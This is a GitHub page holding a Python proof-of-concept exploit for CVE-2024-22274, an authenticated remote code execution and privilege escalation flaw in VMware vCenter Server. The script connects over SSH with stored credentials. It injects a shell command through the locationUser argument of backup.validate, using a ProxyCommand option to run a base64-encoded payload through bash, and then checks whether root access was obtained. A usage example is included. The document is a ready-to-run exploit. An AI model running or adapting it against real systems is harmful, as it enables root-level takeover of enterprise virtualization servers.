-
Notifications
You must be signed in to change notification settings - Fork 7
/
CVE-2024-22274-RCE.py
88 lines (71 loc) · 3.78 KB
/
CVE-2024-22274-RCE.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
import base64
import argparse
from fabric import Connection
from colorama import Fore, Style, init
init(autoreset=True)
def ssh_credentials(config_file):
"""Grabbed the username and password from vcenter_creds.txt"""
credentials = {}
with open(config_file, 'r') as file:
for line in file:
key, value = line.strip().split('=', 1)
credentials[key] = value
return credentials
def exploit(host, port, payload_path, credentials):
"""Please read and review the script before running this tool to avoid error's"""
try:
with open(payload_path, 'r') as file:
payload_encoded = file.read().strip()
decode_payload = base64.b64decode(payload_encoded).decode()
# VMware vCenter command
payload_command = f"""
backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/bash -c \"{echo,{decode_payload}}|{base64,-d}|bash\" 2>' --locationPassword
"""
username = credentials.get('username')
password = credentials.get('password')
if not username or not password:
raise ValueError(f"{Fore.LIGHTYELLOW_EX}Username or password not found in configuration file.{Style.RESET_ALL}")
conn = Connection(
host=host,
port=port,
user=username,
connect_kwargs={"password": password}
)
print(f"{Fore.LIGHTGREEN_EX}[+] Connected to {Fore.LIGHTWHITE_EX}{host} via SSH{Style.RESET_ALL}")
result = conn.run(payload_command, hide=True)
print(f"{Fore.LIGHTGREEN_EX}[+] Payload executed successfully.{Fore.LIGHTWHITE_EX} Output: {result.stdout}{Style.RESET_ALL}")
if "root" in result.stdout.lower() or "uid=0" in result.stdout.lower():
print(f"{Fore.LIGHTGREEN_EX}[+] Exploitation successful: You have root access.{Style.RESET_ALL}")
else:
print(f"{Fore.LIGHTRED_EX}[+] Exploitation failed: Root access not obtained.{Style.RESET_ALL}")
print(f"{Fore.LIGHTBLUE_EX}[+] Finished executing commands on {host}{Style.RESET_ALL}")
except Exception as ex:
print(f"{Fore.LIGHTRED_EX}[-] Error: {ex}{Style.RESET_ALL}")
def main():
"""Parse arguments and run the exploit function."""
banner = f"""{Fore.LIGHTGREEN_EX}
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
{Style.RESET_ALL}"""
parser = argparse.ArgumentParser(
description="Privileges Escalation: Authenticated Remote Code Execution in VMware vCenter Server",
epilog=f"{Fore.LIGHTGREEN_EX}Exploit usage: python3 CVE-2024-22274-RCE.py -t 192.168.1.100 -P 22 -p payload.txt -c vCenter_creds.txt{Style.RESET_ALL}"
)
print(banner)
parser.add_argument('-t', '--target', required=True, help="Target Host address to connect to")
parser.add_argument('-P', '--port', type=int, default=22, help="Port number (default: 22)")
parser.add_argument('-p', '--payload', required=True, help="File containing the base64-encoded payload")
parser.add_argument('-c', '--config', default='vCenter_creds.txt', help="File containing SSH credentials (default: vCenter_creds.txt)")
args = parser.parse_args()
credentials = ssh_credentials(args.config)
exploit(
host=args.target,
port=args.port,
payload_path=args.payload,
credentials=credentials
)
if __name__ == "__main__":
main()